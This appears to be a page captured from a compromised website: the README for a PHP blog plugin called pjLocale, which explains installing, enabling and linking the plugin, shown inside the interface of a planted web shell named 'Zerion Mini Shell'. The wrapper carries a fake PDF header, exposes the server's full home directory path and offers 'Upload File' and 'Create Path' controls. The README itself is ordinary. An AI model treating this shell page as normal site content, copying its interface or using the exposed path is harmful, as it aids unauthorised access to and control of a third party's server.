%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home1/dimen328/libertysa.com.br/admin/modules/blog/app/plugins/pjLocale/config/
Upload File :
Create Path :
Current File : //home1/dimen328/libertysa.com.br/admin/modules/blog/app/plugins/pjLocale/config/README.txt

1. How to install a plugin
-----------------------------------------------
	1.1 Before script installation
		- Copy the plugin folder and paste it into 'app/plugins/'
		- Do the same for all the plugins you need, then install the script
	
	1.2 After script installation
		- Copy the plugin folder and paste it into 'app/plugins/'
		- Manually run the plugin *.sql file(s), located in 'app/plugins/pjLocale/config/'


2. How to enable a plugin
-----------------------------------------------
	Add plugin name to $CONFIG['plugins'] array into 'app/config/config.inc.php' and 'app/config/config.sample.php'
	For example: 
	<?php
	$CONFIG['plugins'] = array('pjGallery', 'pjLocale');
	//-- OR -- 
	$CONFIG['plugins'] = 'pjLocale';
	?>


3. How to access the plugin
-----------------------------------------------
	For example:
	index.php?controller=pjLocale
	index.php?controller=pjLocale&action=index
	
	Add above url as hyperlink to the menu if you need to

Zerion Mini Shell 1.0